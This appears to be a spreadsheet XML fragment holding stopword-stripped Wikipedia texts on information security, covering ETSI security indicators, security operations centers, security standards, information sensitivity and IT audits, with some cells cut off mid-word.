    <t>information technology, benchmarking computer security requires measurements comparing different systems single systems dedicated situations. technical approach pre-defined catalog security events (security incident vulnerability) together corresponding formula calculation security indicators accepted comprehensive. information security indicators standardized etsi industrial specification group (isg) isi. these indicators provide basis switch qualitative quantitative culture security scope measurements: external internal threats (attempt success), user's deviant behaviours, nonconformities and/or vulnerabilities (software, configuration, behavioural, general security framework). 2019 terminated related standards maintained etsi cyber. list information security indicators belongs framework consists following eight closely linked work items: indicators (isi-001-1 guide isi-001-2): powerful assess security controls level enforcement effectiveness benchmarking) event model (isi-002): comprehensive security event classification model (taxonomy representation) maturity (isi-003): necessary assess maturity level regarding overall siem capabilities (technology/people/process) weigh event detection results. methodology complemented isi-005 (which detailed case-by-case approach) guidelines event detection implementation (isi-004): demonstrate examples produce indicators detect related events various means methods (with classification cases/symptoms) event stimulation (isi-005): propose produce security events test effectiveness existing detection means (for major types events) isi-compliant measurement event management architecture cyber security safety (isi-006): this work item focuses designing cybersecurity language model threat intelligence information enable detection tools interoperability. guidelines building operating secured (isi-007): requirements build operate secured (security operations center) addressing technical, human process aspects. description whole organization-wide siem approach (isi-008): whole siem (cert/soc based) approach positioning aspects specifications.preliminary work information security indicators done french club r2gs. first public standards (security indicators list event model) released april 2013. references external links etsi members etsi cyber (responsible maintenance) etsi flyer quick reference card events quick reference card club r2gs portal</t>
  </si>
  <si>
    <t>Information security operations center</t>
  </si>
  <si>
    <t>information security operations center (isoc soc) facility enterprise information systems (web sites, applications, databases, data centers servers, networks, desktops endpoints) monitored, assessed, defended. objective related people, processes technologies provide situational awareness detection, containment, remediation threats order manage enhance organization's security posture. handle, behalf institution company, threatening incident, ensure properly identified, analyzed, communicated, investigated reported. also monitors applications identify possible cyber-attack intrusion (event), determines genuine malicious threat (incident), could affect business. regulatory requirements establishing operating expensive difficult; organisations need good reason this include: protecting sensitive data complying industry rules dss. complying government rules, cesg gpg53. alternative names security operations center (soc) also called security defense center (sdc), security analytics center (sac), network security operations center (nsoc), security intelligence center, cyber security center, threat defense center, security intelligence operations center (sioc). canadian federal government term, infrastructure protection center (ipc), used describe soc. technology socs typically based around security information event management (siem) system aggregates correlates data security feeds network discovery vulnerability assessment systems; governance, risk compliance (grc) systems; site assessment monitoring systems, application database scanners; penetration testing tools; intrusion detection systems (ids); intrusion prevention system (ips); management systems; network behavior analysis cyber threat intelligence; wireless intrusion prevention system; firewalls, enterprise antivirus unified threat management (utm). siem technology creates "single pane glass" security analysts monitor enterprise. people staff includes analysts, security engineers, managers seasoned networking professionals. they usually trained computer engineering, cryptography, network engineering, computer science credentials cissp giac. staffing plans range eight hours day, five days week (8x5) twenty four hours day, seven days week (24x7). shifts include least analysts responsibilities clearly defined. organization large organizations governments operate manage different groups information communication technology provide redundancy event site unavailable. work outsourced, instance, using managed security service. term traditionally used governments managed computer security providers, although growing number large corporations organizations also centers. network operations center (noc) complement work tandem. usually responsible monitoring maintaining overall network infrastructure, primary function ensure uninterrupted network service. responsible protecting networks, well sites, applications, databases, servers data centers, technologies. likewise, physical security operations center coordinate work together. physical facility large organizations security staff monitor control security officers/guards, alarms, cctv, physical access, lighting, vehicle barriers, etc. every role. there three different focus areas active, combined combination: control focusing state security compliancy testing, penetration testing, vulnerability testing, etc. monitoring focusing events response monitoring, siem administration, incident response operational focusing operational security administration identity access management, management, firewall administration, etc.in cases soc, physical housed facility organizationally combined, especially focus operational tasks. originates cert organisation, focus usually monitoring control, case operates independently maintain separation duties. typically, larger organizations maintain separate ensure focus expertise. collaborates closely network operations physical security operations. facilities socs usually well protected physical, electronic, computer, personnel security. centers often laid desks facing video wall, displays significant status, events alarms; ongoing incidents; corner wall sometimes used showing news weather channel, keep staff aware current events affect information systems. security engineer security analyst several computer monitors desk. process procedures processes procedures within clearly spell roles responsibilities well monitoring procedures. these processes include business, technology, operational analytical processes. they steps taken event alert breach including escalation procedures, reporting procedures, breach response procedures. cloudsoc cloud security operations center (cloudsoc) monitor cloud service within enterprise (and keep shadow problem control), parse audit infrastructure application logs siem technologies machine data platforms provide alerts details suspicious activity. smart smart (security operations center) comprehensive, technology agnostic cybersecurity solution utilizes leading-edge technology tools, highly skilled experienced human talent (composed cyber intelligence gatherers, analysts, security experts), proactive cyberwarfare principles prevent neutralize threats organization’s digital infrastructure, assets, data. other types references addition, many commonly referenced terms related original "isoc" title including following: snoc, security network operations center asoc, advanced security operations center gsoc, global security operations center vsoc, virtual security operations center also data center managed security service references</t>
  </si>
  <si>
    <t>Information security standards</t>
  </si>
  <si>
    <t>term "standard" sometimes used within context information security policies distinguish written policies, standards procedures. organizations maintain three levels documentation help secure environment. information security policies high-level statements rules protecting people systems. (for example, policy would state "company maintain secure passwords") "standard" low-level prescription various ways company enforce given policy. (for example, "passwords least characters, require least number.") "procedure" describe step-by-step method implementing various standards. (for example, "company enable password length controls production windows systems.") this term "standard" differs term relates information security privacy frameworks, iso/iec 27002 cobit.</t>
  </si>
  <si>
    <t>Information security</t>
  </si>
  <si>
    <t>information security, sometimes shortened infosec, practice protecting information mitigating information risks. part information risk management. typically involves preventing reducing probability unauthorized/inappropriate access data, unlawful use, disclosure, disruption, deletion, corruption, modification, inspection, recording, devaluation information. also involves actions intended reduce adverse impacts incidents. protected information take form, e.g. electronic physical, tangible (e.g. paperwork) intangible (e.g. knowledge). information security's primary focus balanced protection confidentiality, integrity, availability data (also known triad) maintaining focus efficient policy implementation, without hampering organization productivity. this largely achieved structured risk management process involves: identifying information related assets, plus potential threats, vulnerabilities, impacts; evaluating risks deciding address treat risks i.e. avoid, mitigate, share accept risk mitigation required, selecting designing appropriate security controls implementing monitoring activities, making adjustments necessary address issues, changes improvement opportunitiesto standardize discipline, academics professionals collaborate offer guidance, policies, industry standards password, antivirus software, firewall, encryption software, legal liability, security awareness training, forth. this standardization driven wide variety laws regulations affect data accessed, processed, stored, transferred destroyed. however, implementation standards guidance within entity limited effect culture continual improvement adopted. definition various definitions information security suggested below, summarized different sources: "preservation confidentiality, integrity availability information. note: addition, properties, authenticity, accountability, non-repudiation reliability also involved." (iso/iec 27000:2009) "the protection information information systems unauthorized access, use, disclosure, disruption, modification, destruction order provide confidentiality, integrity, availability." (cnss, 2010) "ensures authorized users (confidentiality) access accurate complete information (integrity) required (availability)." (isaca, 2008) "information security process protecting intellectual property organisation." (pipkin, 2000) "...information security risk management discipline, whose manage cost information risk business." (mcdermott geer, 2001) well-informed sense assurance information risks controls balance." (anderson, 2003) "information security protection information minimizes risk exposing information unauthorized parties." (venter eloff, 2003) "information security multidisciplinary area study professional activity concerned development implementation security mechanisms available types (technical, organizational, human-oriented legal) order keep information locations (within outside organization's perimeter) and, consequently, information systems, information created, processed, stored, transmitted destroyed, free threats. threats information information systems categorized corresponding security goal defined category threats. security goals, identified result threat analysis, revised periodically ensure adequacy conformance evolving environment. currently relevant security goals include: confidentiality, integrity, availability, privacy, authenticity trustworthiness, non-repudiation, accountability auditability." (cherdantseva hilton, 2013) information information resource security using telecommunication system devices means protecting information, information systems books unauthorized access, damage, theft, destruction (kurose ross, 2010). overview core information security information assurance, maintaining confidentiality, integrity, availability (cia) information, ensuring information compromised critical issues arise. these issues include limited natural disasters, computer/server malfunction, physical theft. while paper-based business operations still prevalent, requiring information security practices, enterprise digital initiatives increasingly emphasized, information assurance typically dealt information technology (it) security specialists. these specialists apply information security technology (most often form computer system). worthwhile note computer necessarily mean home desktop. computer device processor memory. such devices range non-networked standalone devices simple calculators, networked mobile computing devices smartphones tablet computers. security specialists almost always found major enterprise/establishment nature value data within larger businesses. they responsible keeping technology within company secure malicious cyber attacks often attempt acquire critical private information gain control internal systems.the field information security grown evolved significantly recent years. offers many areas specialization, including securing networks allied infrastructure, securing applications databases, security testing, information systems auditing, business continuity planning, electronic record discovery, digital forensics. information security professionals stable employment. 2013 percent professionals change employer employment period year, number professionals projected continuously grow percent annually 2014 2019. threats information security threats come many different forms. some common threats today software attacks, theft intellectual property, theft identity, theft equipment information, sabotage, information extortion. most people experienced software attacks sort. viruses, worms, phishing attacks, trojan horses common examples software attacks. theft intellectual property also extensive issue many businesses information technology (it) field. identity theft attempt someone else usually obtain person's personal information take advantage access vital information social engineering. theft equipment information becoming prevalent today fact devices today mobile, prone theft also become desirable amount data capacity increases. sabotage usually consists destruction organization's website attempt cause loss confidence part customers. information extortion consists theft company's property information attempt receive payment exchange returning information property back owner, ransomware. there many ways help protect attacks functional precautions conduct periodical user awareness. number threat organisation users internal employees, also called insider threats.governments, military, corporations, financial institutions, hospitals, non-profit organisations, private businesses amass great deal confidential information employees, customers, products, research, financial status. should confidential information business' customers finances product line fall hands competitor black hacker, business customers could suffer widespread, irreparable financial loss, well damage company's reputation. from business perspective, information security must balanced cost; gordon-loeb model provides mathematical economic approach addressing concern.for individual, information security significant effect privacy, viewed differently various cultures. responses threats possible responses security threat risk are: reduce/mitigate implement safeguards countermeasures eliminate vulnerabilities block threats assign/transfer place cost threat onto another entity organization purchasing insurance outsourcing accept evaluate cost countermeasure outweighs possible cost loss threat history since early days communication, diplomats military commanders understood necessary provide mechanism protect confidentiality correspondence means detecting tampering. julius caesar credited invention caesar cipher b.c., created order prevent secret messages read message fall wrong hands. however, part protection achieved application procedural handling controls. sensitive information marked indicate protected transported trusted persons, guarded stored secure environment strong box. postal services expanded, governments created official organizations intercept, decipher, read, reseal letters (e.g., u.k.'s secret office, founded 1653). mid-nineteenth century complex classification systems developed allow governments manage information according degree sensitivity. example, british government codified this, extent, publication official secrets 1889. section concerned espionage unlawful disclosures information, section dealt breaches official trust. public interest defense soon added defend disclosures interest state. similar passed india 1889, indian official secrets act, associated british colonial used crack newspapers opposed raj's policies. newer version passed 1923 extended matters confidential secret information governance. time first world war, multi-tier classification systems used communicate information various fronts, encouraged greater code making breaking sections diplomatic military headquarters. encoding became sophisticated wars machines employed scramble unscramble information.the establishment computer security inaugurated history information security. need appeared world volume information shared allied countries second world necessitated formal alignment classification systems procedural controls. arcane range markings evolved indicate could handle documents (usually officers rather enlisted troops) stored increasingly complex safes storage facilities developed. enigma machine, employed germans encrypt data warfare successfully decrypted alan turing, regarded striking example creating using secured information. procedures evolved ensure documents destroyed properly, failure follow procedures greatest intelligence coups (e.g., capture u-570). various mainframe computers connected online cold complete sophisticated tasks, communication process easier mailing magnetic tapes back forth computer centers. such, advanced research projects agency (arpa), united states department defense, started researching feasibility networked system communication trade information within united states armed forces. 1968, arpanet project formulated larry roberts, would later evolve known internet.in 1973, important elements arpanet security found internet pioneer robert metcalfe many flaws the: "vulnerability password structure formats; lack safety procedures dial-up connections; nonexistent user identification authorizations", aside lack controls safeguards keep data safe unauthorized access. hackers effortless access arpanet, phone numbers known public. problems, coupled constant violation computer security, well exponential increase number hosts users system, "network security" often alluded "network insecurity".the twentieth century early years twenty-first century rapid advancements telecommunications, computing hardware software, data encryption. availability smaller, powerful, less expensive computing equipment made electronic data processing within reach small business home users. establishment transfer control protocol/internetwork protocol (tcp/ip) early 1980s enabled different types computers communicate. these computers quickly became interconnected internet.the rapid growth widespread electronic data processing electronic business conducted internet, along numerous occurrences international terrorism, fueled need better methods protecting computers information store, process, transmit. academic disciplines computer security information assurance emerged along numerous professional organizations, sharing common goals ensuring security reliability information systems. basic principles concepts triad confidentiality, integrity, availability heart information security. (the members classic infosec triad—confidentiality, integrity, availability—are interchangeably referred literature security attributes, properties, security goals, fundamental aspects, information criteria, critical information characteristics basic building blocks.) however, debate continues whether triad sufficient address rapidly changing technology business requirements, recommendations consider expanding intersections availability confidentiality, well relationship security privacy. other principles "accountability" sometimes proposed; pointed issues non-repudiation well within three core concepts.the triad seems first mentioned nist publication 1977.in 1992 revised 2002, oecd's guidelines security information systems networks proposed nine generally accepted principles: awareness, responsibility, response, ethics, democracy, risk assessment, security design implementation, security management, reassessment. building upon those, 2004 nist's engineering principles information technology security proposed principles. from derived guidelines practices. 1998, donn parker proposed alternative model classic triad called atomic elements information. elements confidentiality, possession, integrity, authenticity, availability, utility. merits parkerian hexad subject debate amongst security professionals.in 2011, open group published information security management standard o-ism3. this standard proposed operational definition concepts security, elements called "security objectives", related access control (9), availability (3), data quality (1), compliance, technical (4). 2009, software protection initiative archived 2016-09-25 wayback machine released three tenets cybersecurity archived 2020-05-10 wayback machine system susceptibility, access flaw, capability exploit flaw. neither models widely adopted. confidentiality information security, confidentiality property, information made available disclosed unauthorized individuals, entities, processes. while similar "privacy," words interchangeable. rather, confidentiality component privacy implements protect data unauthorized viewers. examples confidentiality electronic data compromised include laptop theft, password theft, sensitive emails sent incorrect individuals. integrity security, data integrity means maintaining assuring accuracy completeness data entire lifecycle. this means data cannot modified unauthorized undetected manner. this thing referential integrity databases, although viewed special case consistency understood classic acid model transaction processing. information security systems typically incorporate controls ensure integrity, particular protecting kernel core functions deliberate accidental threats. multi-purpose multi-user computer systems compartmentalize data processing user process adversely impact another: controls succeed however, incidents malware infections, hacks, data theft, fraud, privacy breaches.more broadly, integrity information security principle involves human/social, process, commercial integrity, well data integrity. touches aspects credibility, consistency, truthfulness, completeness, accuracy, timeliness, assurance. availability information system serve purpose, information must available needed. this means computing systems used store process information, security controls used protect communication channels used access must functioning correctly. high availability systems remain available times, preventing service disruptions power outages, hardware failures, system upgrades. ensuring availability also involves preventing denial-of-service attacks, flood incoming messages target system, essentially forcing shut down.in realm information security, availability often viewed important parts successful information security program. ultimately end-users need able perform functions; ensuring availability organization able perform standards organization's stakeholders expect. this involve topics proxy configurations, outside access, ability access shared drives ability send emails. executives oftentimes understand technical side information security look availability easy fix, often requires collaboration many different organizational teams, network operations, development operations, incident response, policy/change management. successful information security team involves many different roles mesh align triad provided effectively. non-repudiation law, non-repudiation implies one's intention fulfill obligations contract. also implies party transaction cannot deny received transaction, party deny sent transaction.it important note technology cryptographic systems assist non-repudiation efforts, concept core legal concept transcending realm technology. not, instance, sufficient show message matches digital signature signed sender's private key, thus sender could sent message, nobody else could altered transit (data integrity). alleged sender could return demonstrate digital signature algorithm vulnerable flawed, allege prove signing compromised. fault violations sender, assertions relieve sender liability, assertion would invalidate claim signature necessarily proves authenticity integrity. such, sender repudiate message (because authenticity integrity pre-requisites non-repudiation). risk management broadly speaking, risk likelihood something happen causes harm informational asset loss asset). vulnerability weakness could used endanger cause harm informational asset. threat anything (man-made nature) potential cause harm. likelihood threat vulnerability cause harm creates risk. when threat vulnerability inflict harm, impact. context information security, impact loss availability, integrity, confidentiality, possibly losses (lost income, loss life, loss real property).the certified information systems auditor (cisa) review manual 2006 defines risk management "the process identifying vulnerabilities threats information resources used organization achieving business objectives, deciding countermeasures, any, take reducing risk acceptable level, based value information resource organization."there things definition need clarification. first, process risk management ongoing, iterative process. must repeated indefinitely. business environment constantly changing threats vulnerabilities emerge every day. second, choice countermeasures (controls) used manage risks must strike balance productivity, cost, effectiveness countermeasure, value informational asset protected. furthermore, processes limitations security breaches generally rare emerge specific context easily duplicated. thus, process countermeasure evaluated vulnerabilities. possible identify risks, possible eliminate risk. remaining risk called "residual risk." risk assessment carried team people knowledge specific areas business. membership team vary time different parts business assessed. assessment subjective qualitative analysis based informed opinion, reliable dollar figures historical information available, analysis quantitative analysis. research shown vulnerable point information systems human user, operator, designer, human. iso/iec 27002:2005 code practice information security management recommends following examined risk assessment: security policy, organization information security, asset management, human resources security, physical environmental security, communications operations management, access control, information systems acquisition, development, maintenance, information security incident management, business continuity management regulatory compliance.in broad terms, risk management process consists identification assets estimating value. include: people, buildings, hardware, software, data (electronic, print, other), supplies. conduct threat assessment. include: acts nature, acts war, accidents, malicious acts originating inside outside organization. conduct vulnerability assessment, vulnerability, calculate probability exploited. evaluate policies, procedures, standards, training, physical security, quality control, technical security. calculate impact threat would asset. qualitative analysis quantitative analysis. identify, select implement appropriate controls. provide proportional response. consider productivity, cost effectiveness, value asset. evaluate effectiveness control measures. ensure controls provide required cost effective protection without discernible loss productivity.for given risk, management choose accept risk based upon relative value asset, relative frequency occurrence, relative impact business. leadership choose mitigate risk selecting implementing appropriate control measures reduce risk. cases, risk transferred another business buying insurance outsourcing another business. reality risks disputed. cases leadership choose deny risk. security controls selecting implementing proper security controls initially help organization bring risk acceptable levels. control selection follow based risk assessment. controls vary nature, fundamentally ways protecting confidentiality, integrity availability information. iso/iec 27001 defined controls different areas. organizations implement additional controls according requirement organization. iso/iec 27002 offers guideline organizational information security standards. administrative administrative controls (also called procedural controls) consist approved written policies, procedures, standards, guidelines. administrative controls form framework running business managing people. they inform people business day-to-day operations conducted. laws regulations created government bodies also type administrative control inform business. some industry sectors policies, procedures, standards, guidelines must followed payment card industry data security standard (pci dss) required visa mastercard example. other examples administrative controls include corporate security policy, password policy, hiring policies, disciplinary policies.administrative controls form basis selection implementation logical physical controls. logical physical controls manifestations administrative controls, paramount importance. logical logical controls (also called technical controls) software data monitor control access information computing systems. passwords, network host-based firewalls, network intrusion detection systems, access control lists, data encryption examples logical controls.an important logical control frequently overlooked principle least privilege, requires individual, program system process granted access privileges necessary perform task. blatant example failure adhere principle least privilege logging windows user administrator read email surf web. violations principle also occur individual collects additional access privileges time. this happens employees' duties change, employees promoted position, employees transferred another department. access privileges required duties frequently added onto already existing access privileges, longer necessary appropriate. physical physical controls monitor control environment work place computing facilities. they also monitor control access facilities include doors, locks, heating conditioning, smoke fire alarms, fire suppression systems, cameras, barricades, fencing, security guards, cable locks, etc. separating network workplace functional areas also physical controls.an important physical control frequently overlooked separation duties, ensures individual complete critical task himself. example, employee submits request reimbursement also able authorize payment print check. applications programmer also server administrator database administrator; roles responsibilities must separated another. defense depth information security must protect information throughout lifespan, initial creation information final disposal information. information must protected motion rest. during lifetime, information pass many different information processing systems many different parts information processing systems. there many different ways information information systems threatened. fully protect information lifetime, component information processing system must protection mechanisms. building layering overlapping security measures called "defense depth." contrast metal chain, famously strong weakest link, defense depth strategy aims structure where, defensive measure fail, measures continue provide protection.recall earlier discussion administrative controls, logical controls, physical controls. three types controls used form basis upon build defense depth strategy. with approach, defense depth conceptualized three distinct layers planes laid other. additional insight defense depth gained thinking forming layers onion, data core onion, people next outer layer onion, network security, host-based security, application security forming outermost layers onion. both perspectives equally valid, provides valuable insight implementation good defense depth strategy. classification important aspect information security risk management recognizing value information defining appropriate procedures protection requirements information. information equal information requires degree protection. this requires information assigned security classification. first step information classification identify member senior management owner particular information classified. next, develop classification policy. policy describe different classification labels, define criteria information assigned particular label, list required security controls classification.some factors influence classification information assigned include much value information organization, information whether information become obsolete. laws regulatory requirements also important considerations classifying information. information systems audit control association (isaca) business model information security also serves tool security professionals examine security systems perspective, creating environment security managed holistically, allowing actual risks addressed.the type information security classification labels selected used depend nature organization, examples being: business sector, labels public, sensitive, private, confidential. government sector, labels unclassified, unofficial, protected, confidential, secret, secret, non-english equivalents. cross-sectoral formations, traffic light protocol, consists white, green, amber, red.all employees organization, well business partners, must trained classification schema understand required security controls handling procedures classification. classification particular information asset assigned reviewed periodically ensure classification still appropriate information ensure security controls required classification place followed right procedures. access control access protected information must restricted people authorized access information. computer programs, many cases computers process information, must also authorized. this requires mechanisms place control access protected information. sophistication access control mechanisms parity value information protected; sensitive valuable information stronger control mechanisms need foundation access control mechanisms built start identification authentication.access control generally considered three steps: identification, authentication, authorization. identification identification assertion someone something person makes statement "hello, name john doe" making claim are. however, claim true. before john granted access protected information necessary verify person claiming john really john doe. typically claim form username. entering username claiming person username belongs to". authentication authentication verifying claim identity. when john goes bank make withdrawal, tells bank teller john doe, claim identity. bank teller asks photo hands teller driver's license. bank teller checks license make sure john printed compares photograph license person claiming john doe. photo name match person, teller authenticated john claimed similarly, entering correct password, user providing evidence he/she person username belongs to.there three different types information used authentication: something know: things pin, password, mother's maiden name something have: driver's license magnetic swipe card something are: biometrics, including palm prints, fingerprints, voice prints, retina (eye) scansstrong authentication requires providing type authentication information (two-factor authentication). username common form identification computer systems today password common form authentication. usernames passwords served purpose, increasingly inadequate. usernames passwords slowly replaced supplemented sophisticated authentication mechanisms time-based one-time password algorithms. authorization after person, program computer successfully identified authenticated must determined informational resources permitted access actions allowed perform (run, view, create, delete, change). this called authorization. authorization access information computing services begins administrative policies procedures. policies prescribe information computing services accessed, whom, conditions. access control mechanisms configured enforce policies. different computing systems equipped different kinds access control mechanisms. some even offer choice different access control mechanisms. access control mechanism system offers based upon three approaches access control, derived combination three approaches.the non-discretionary approach consolidates access control centralized administration. access information resources usually based individuals function (role) organization tasks individual must perform. discretionary approach gives creator owner information resource ability control access resources. mandatory access control approach, access granted denied basing upon security classification assigned information resource.examples common access control mechanisms today include role-based access control, available many advanced database management systems; simple file permissions provided unix windows operating systems; group policy objects provided windows network systems; kerberos, radius, tacacs, simple access lists used many firewalls routers.to effective, policies security controls must enforceable upheld. effective policies ensure people held accountable actions. u.s. treasury's guidelines systems processing sensitive proprietary information, example, states failed successful authentication access attempts must logged, access information must leave type audit trail.also, need-to-know principle needs effect talking access control. this principle gives access rights person perform functions. this principle used government dealing difference clearances. even though employees different departments top-secret clearance, must need-to-know order information exchanged. within need-to-know principle, network administrators grant employee least amount privilege prevent employees accessing supposed need-to-know helps enforce confidentiality-integrity-availability triad. need-to-know directly impacts confidential area triad. cryptography information security uses cryptography transform usable information form renders unusable anyone authorized user; process called encryption. information encrypted (rendered unusable) transformed back original usable form authorized user possesses cryptographic key, process decryption. cryptography used information security protect information unauthorized accidental disclosure information transit (either electronically physically) information storage.cryptography provides information security useful applications well, including improved authentication methods, message digests, digital signatures, non-repudiation, encrypted network communications. older, less secure applications telnet file transfer protocol (ftp) slowly replaced secure applications secure shell (ssh) encrypted network communications. wireless communications encrypted using protocols wpa/wpa2 older (and less secure) wep. wired communications (such itu‑t g.hn) secured using encryption x.1035 authentication exchange. software applications gnupg used encrypt data files email.cryptography introduce security problems implemented correctly. cryptographic solutions need implemented using industry-accepted solutions undergone rigorous peer review independent experts cryptography. length strength encryption also important consideration. weak short produce weak encryption. keys used encryption decryption must protected degree rigor confidential information. they must protected unauthorized disclosure destruction, must available needed. public infrastructure (pki) solutions address many problems surround management. process terms "reasonable prudent person", "due care", "due diligence" used fields finance, securities, many years. recent years terms found fields computing information security. u.s. federal sentencing guidelines make possible hold corporate officers liable failing exercise care diligence management information systems.in business world, stockhol</t>
  </si>
  <si>
    <t>Information sensitivity</t>
  </si>
  <si>
    <t>information sensitivity control access information knowledge might result loss advantage level security disclosed others. loss, misuse, modification, unauthorized access sensitive information adversely affect privacy welfare individual, trade secrets business even security international relations nation depending level sensitivity nature information. https://en.m.wikipedia.org/wiki/hacktivism non-sensitive information public information this refers information already matter public record knowledge. with regard government private organizations, access release information requested member public, often formal processes laid accessibility government-held public records important part government transparency, accountability citizens, values democracy. public records furthermore refer information identifiable individuals considered confidential, including limited census records, criminal records, offender registry files, voter registration. routine business information this includes business information subjected special protection routinely shared anyone inside outside business. types sensitive information confidential information used general sense mean sensitive information whose access subject restriction, refer information individual well pertains business. however, situations release personal information could negative effect owner. example, person trying avoid stalker inclined restrict access personal information. furthermore, person's sin, credit card numbers, financial information considered private disclosure might lead crimes identity theft fraud. some types private information, including records person's health care, education, employment protected privacy laws. unauthorized disclosure private information make perpetrator liable civil remedies cases subject criminal penalties. even though often used interchangeably, personal information sometimes distinguished private information, personally identifiable information. latter distinct former private information used identify unique individual. personal information, hand, information belonging private life individual cannot used uniquely identify individual. this range individual's favourite colour, details domestic life. latter common example personal information also regarded sensitive, individual sharing details trusted listener would prefer shared anyone else, sharing result unwanted consequences. confidential business information confidential business information refers information whose disclosure harm business. such information include trade secrets, sales marketing plans, product plans, notes associated patentable inventions, customer supplier information, financial data, more. classified classified information generally refers information subject special security classification regulations imposed many national governments, disclosure cause harm national interests security. protocol restriction imposed upon information categorized hierarchy classification levels almost every national government worldwide, restricted levels containing information cause greatest danger national security leaked. authorized access granted individuals need know basis also passed appropriate level security clearance. classified information reclassified different level declassified (made available public) depending changes situation intelligence. classified information also denoted method communication access. example, protectively marked "secret" eyes only protectively marked "secret" encrypted transfer only. indicating document must physically read recipient cannot openly discussed example telephone conversation communication sent using encrypted means. often mistakenly listed meaning eyes intended recipient anomaly becomes apparent additional "not within windowed area" also used. legal protection unauthorised disclosure personal private information data privacy concerns exist various aspects daily life wherever personal data stored collected, internet, medical records, financial records, expression political opinions. countries world, personally identifiable information protected information privacy laws, outline limits collection personally identifiable information public private entities. such laws usually require entities give clear unambiguous notice individual types data collected, reason collection, planned uses data. consent-based legal frameworks, explicit consent individual required well.the passed general data protection regulation (gdpr), replacing earlier data protection directive. regulation adopted april 2016. became enforceable 2018 two-year transition period and, unlike directive, require national governments pass enabling legislation, thus directly binding applicable. "the proposed data protection regime extends scope data protection foreign companies processing data residents. provides harmonisation data protection regulations throughout thereby making easier non-european companies comply regulations; however, comes cost strict data protection compliance regime severe penalties worldwide turnover." gdpr also brings "digital rights" citizens economic value personal data increasing digital economy. canada, personal information protection electronic documents (pipeda) regulates collection personal data electronic documents public private organizations. pipeda effect federal provincial jurisdictions, except provinces existing privacy laws determined “substantially similar”.even though unified sensitive information framework, united states implemented significant amount privacy legislation pertaining different specific aspects data privacy, emphasis privacy healthcare, financial, e-commerce, educational industries, federal state levels. whether regulated self regulated, laws require establish ways access sensitive information limited people different roles, thus essence requiring establishment "sensitive data domain" model mechanisms protection. some domains guideline form pre-defined models "safe harbor" hipaa, based research latanya sweeny established privacy industry metrics. additionally, many countries enacted legislature regarding data privacy protection, still process confidential business information confidentiality sensitive business information established non-disclosure agreements, legally binding contract parties professional relationship. ndas one-way, case employee receiving confidential information employing organization, two-way businesses needing share information another accomplish business goal. depending severity consequences, violation non-disclosure result employment loss, loss business client contacts, criminal charges civil lawsuit, hefty damages. when ndas signed employer employee initiation employment, non-compete clause part agreement added protection sensitive business information, employee agrees work competitors start competing business within certain time geographical limit. unlike personal private information, internationally recognized framework protecting trade secrets, even agreed-upon definition term “trade secret”. however, many countries political jurisdictions taken initiative account violation commercial confidentiality criminal civil laws. example, economic espionage 1996, federal crime united states misappropriate trade secrets knowledge benefit foreign power, injure owner trade secret. more commonly, breach commercial confidentiality falls civil law, united kingdom. developing countries, trade secret laws either non-existent poorly developed offer little substantial protection. classified information many countries, unauthorized disclosure classified information criminal offence, punishable fines, prison sentence, even death penalty, depending severity violation. less severe violations, civil sanctions imposed, ranging reprimand revoking security clearance subsequent termination employment.whistleblowing intentional disclosure sensitive information third-party intention revealing alleged illegal, immoral, otherwise harmful actions. there many examples present former government employees disclosing classified information regarding national government misconduct public media, spite criminal consequences await them. espionage, spying, involves obtaining sensitive information without permission knowledge holder. spies part national intelligence gathering countries, used political strategy nation-states since ancient times. unspoken knowledge international politics countries spying another time, even allies. digital sensitive information computer security information security applied computing network technology, significant ever-growing field computer science. term computer insecurity, hand, concept computer systems inherently vulnerable attack, therefore evolving arms race exploit existing vulnerabilities security systems must engineer mechanisms security. number security concerns arisen recent years increasing amounts sensitive information every level found primary existence digital form. personal level, credit card fraud, internet fraud, forms identity theft become widespread concerns individuals need aware day-to-day basis. existence large databases classified information computer networks also changing face domestic international politics. cyber-warfare cyber espionage becoming increasing importance national security strategy nations around world, estimated nations around world currently actively engaged developing deploying technology purposes.philosophies internet cultures open-source governance, hacktivism, popular hacktivist slogan "information wants free" reflects cultural shifts perception towards political government secrecy. popular, controversial wikileaks many manifestations growing cultural sentiment becoming additional challenge security integrity classified information. also espionage federal standard 1037c national information systems security glossary mandatory access control privacy protocol information privacy external links isoo security clearance notes</t>
  </si>
  <si>
    <t>Information technology audit</t>
  </si>
  <si>
    <t>information technology audit, information systems audit, examination management controls within information technology (it) infrastructure business applications. evaluation evidence obtained determines information systems safeguarding assets, maintaining data integrity, operating effectively achieve organization's goals objectives. these reviews performed conjunction financial statement audit, internal audit, form attestation engagement. audits also known automated data processing audits (adp audits) computer audits. they formerly called electronic data processing audits (edp audits). purpose audit different financial statement audit. while financial audit's purpose evaluate whether financial statements present fairly, material respects, entity's financial position, results operations, cash flows conformity standard accounting practices, purposes audit evaluate system's internal control design effectiveness. this includes, limited efficiency security protocols, development processes, governance oversight. installing controls necessary sufficient provide adequate security. people responsible security must consider controls installed intended, effective, breach security occurred actions done prevent future breaches. these inquiries must answered independent unbiased observers. these observers performing task information systems auditing. information systems (is) environment, audit examination information systems, inputs, outputs, processing. technology continues advance become prevalent lives businesses, along comes increase threats disruptions. these impact every industry come different forms data breaches, external threats, operational issues. these risks need high levels assurance increase need audits check businesses system performances lower probability impact technology threats disruptions.the primary functions audit evaluate systems place guard organization's information. specifically, information technology audits used evaluate organization's ability protect information assets properly dispense information authorized parties. audit aims evaluate following: will organization's computer systems available business times required? (known availability) will information systems disclosed authorized users? (known security confidentiality) will information provided system always accurate, reliable, timely? (measures integrity) way, audit hopes assess risk company's valuable asset (its information) establish methods minimizing risks. more specifically, organizations look three major requirements: confidentiality, integrity, availability label needs security trust systems. confidentiality: purpose keep private information restricted unauthorized users. integrity: purpose guarantee information changed authorized manner availability: purpose ensure authorized users access specific informationthese three requirements emphasized every industry every organization environment requirements controls support vary. types audits various authorities created differing taxonomies distinguish various types audits. goodman lawless state three specific systematic approaches carry audit: technological innovation process audit. this audit constructs risk profile existing projects. audit assess length depth company's experience chosen technologies, well presence relevant markets, organization project, structure portion industry deals project product, organization industry structure. innovative comparison audit. this audit analysis innovative abilities company audited, comparison competitors. this requires examination company's research development facilities, well track record actually producing products. technological position audit: this audit reviews technologies business currently needs add. technologies characterized either "base", "key", "pacing" "emerging".others describe spectrum audits five categories audits: systems applications: audit verify systems applications appropriate, efficient, adequately controlled ensure valid, reliable, timely, secure input, processing, output levels system's activity. system process assurance audits form subtype, focussing business process-centric business systems. such audits objective assist financial auditors.information processing facilities: audit verify processing facility controlled ensure timely, accurate, efficient processing applications normal potentially disruptive conditions. systems development: audit verify systems development meet objectives organization, ensure systems 